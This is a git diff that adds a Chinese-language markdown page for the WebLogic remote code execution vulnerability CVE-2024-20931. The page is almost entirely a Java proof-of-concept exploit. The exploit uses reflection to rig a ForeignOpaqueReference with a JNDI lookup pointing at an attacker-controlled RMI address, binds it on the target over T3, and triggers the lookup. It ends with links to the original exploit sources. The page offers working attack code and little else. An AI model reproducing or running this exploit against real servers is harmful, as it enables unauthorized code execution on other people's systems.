diff --git a/Weblogic远程代码执行(CVE-2024-20931).md b/Weblogic远程代码执行(CVE-2024-20931).md new file mode 100644 index 0000000..8336f64 --- /dev/null +++ b/Weblogic远程代码执行(CVE-2024-20931).md @@ -0,0 +1,54 @@ +## Weblogic远程代码执行(CVE-2024-20931) + +## poc +``` +package com.supeream; + +import weblogic.deployment.jms.ForeignOpaqueReference; + +import javax.naming.Context; +import javax.naming.InitialContext; +import java.lang.reflect.Field; +import java.util.Hashtable; + +public class CVE_2024_209321 { + public static void main(String[] args) throws Exception { + String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory"; + + // 创建用来远程绑定对象的InitialContext + String url = "t3://127.0.0.1:7001"; // 目标机器 + Hashtable env1 = new Hashtable(); + env1.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY); + env1.put(Context.PROVIDER_URL, url); // 目标 + InitialContext c = new InitialContext(env1); + + // ForeignOpaqueReference的jndiEnvironment属性 + Hashtable env2 = new Hashtable(); + env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory"); + env2.put("datasource", "rmi://127.0.0.1:1099/ygevmj"); + + // ForeignOpaqueReference的jndiEnvironment和remoteJNDIName属性 + ForeignOpaqueReference f = new ForeignOpaqueReference(); + Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment"); + jndiEnvironment.setAccessible(true); + jndiEnvironment.set(f, env2); + Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName"); + remoteJNDIName.setAccessible(true); + String ldap = "rmi://127.0.0.1:1099/ygevmj"; + remoteJNDIName.set(f, ldap); + + // 远程绑定ForeignOpaqueReference对象 + c.rebind("glassy", f); + + // lookup查询ForeignOpaqueReference对象 + try { + c.lookup("glassy"); + } catch (Exception e) { + } + } +} +``` + +## 漏洞来源 +- https://github.com/GlassyAmadeus/CVE-2024-20931 +- https://glassyamadeus.github.io/2024/01/31/CVE_2024_20931/